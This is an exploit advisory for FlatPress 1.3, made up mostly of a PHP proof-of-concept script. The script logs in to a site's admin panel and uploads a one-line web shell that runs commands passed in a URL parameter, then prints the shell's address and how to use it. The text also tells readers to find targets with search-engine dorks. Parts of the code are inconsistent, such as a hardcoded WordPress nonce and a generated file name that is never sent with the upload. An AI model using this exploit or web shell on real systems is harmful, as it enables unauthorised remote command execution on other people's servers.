=============================================================================================================================================
| # Title     : FlatPress 1.3 shell upload Vulnerability                                                                                    |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
| # Vendor    : https://github.com/flatpressblog/flatpress/archive/1.3.zip                                                                  |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: The script performs an attack on a website's control panel by exploiting CSRF vulnerabilities and uploading a shell via the website's administrative interface.

   (Related : https://packetstorm.news/files/id/178208/ Related CVE numbers:  ) .
	
[+] save code as poc.php.

[+] Usage: script.php <base_url> <username> <password>

[+] PayLoad :

<?php
function random_string($length = 5) {
    // إنشاء سلسلة عشوائية
    $letters = 'abcdefghijklmnopqrstuvwxyz';
    return substr(str_shuffle($letters), 0, $length);
}

function login_and_upload($base_url, $username, $password) {
    $filename = random_string() . ".php";
    $login_url = "http://{$base_url}/login.php";
    $upload_url = "http://{$base_url}/admin.php?p=uploader&action=default";

    // إنشاء جلسة cURL جديدة
    $ch = curl_init();

    // إعداد خيارات cURL للدخول
    $login_data = [
        'user' => $username,
        'pass' => $password,
        'submit' => 'Login'
    ];

    curl_setopt($ch, CURLOPT_URL, $login_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));

    // تنفيذ الطلب
    $response = curl_exec($ch);

    if (strpos($response, 'Logout') !== false) {
        echo "Login Successful!\n";
    } else {
        echo "Login Failed!\n";
        echo $response;
        return;
    }

    // تحميل الملف
    echo "Shell uploading...\n";

    // إعداد بيانات الفورم لرفع الملف
    $files = [
        'upload[]' => new CURLFile('php://memory', 'text/php', '<?php echo `$_GET[0]`; ?>')
    ];
    $form_data = [
        '_wpnonce' => '9e0ed04260',
        '_wp_http_referer' => '/admin.php?p=uploader',
        'upload' => 'Upload'
    ];

    curl_setopt($ch, CURLOPT_URL, $upload_url);
    curl_setopt($ch, CURLOPT_POSTFIELDS, array_merge($form_data, $files));

    // تنفيذ طلب رفع الملف
    $response = curl_exec($ch);

    if (strpos($response, 'File(s) uploaded') !== false || strpos($response, 'Upload') !== false) {
        $shell_url = "http://{$base_url}/fp-content/attachs/{$filename}";
        echo "Your Shell is Ready: {$shell_url}\n";
        echo "Shell Usage: {$shell_url}?0=command\n";
    } else {
        echo "Exploit Failed!\n";
        echo $response;
    }

    // إغلاق جلسة cURL
    curl_close($ch);
}

// مثال استخدام
if ($argc != 4) {
    echo "Usage: script.php <base_url> <username> <password>\n";
} else {
    list($script, $base_url, $username, $password) = $argv;
    login_and_upload($base_url, $username, $password);
}
?>





Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================